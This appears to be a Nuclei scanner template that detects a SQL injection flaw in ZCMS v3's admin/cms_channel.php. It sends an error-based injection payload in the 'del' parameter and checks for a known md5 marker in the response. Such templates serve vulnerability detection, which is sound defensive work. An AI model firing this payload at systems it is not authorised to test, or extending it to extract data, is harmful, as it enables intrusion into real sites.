id: zcms-v3-sqli
info:
  name: ZCMS SQL Injection
  author: princechaddha
  severity: high
  reference: https://www.anquanke.com/post/id/183241
  tags: zcms,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "6f7c6dcbc380aac3bcba1f9fccec991e"
        part: body
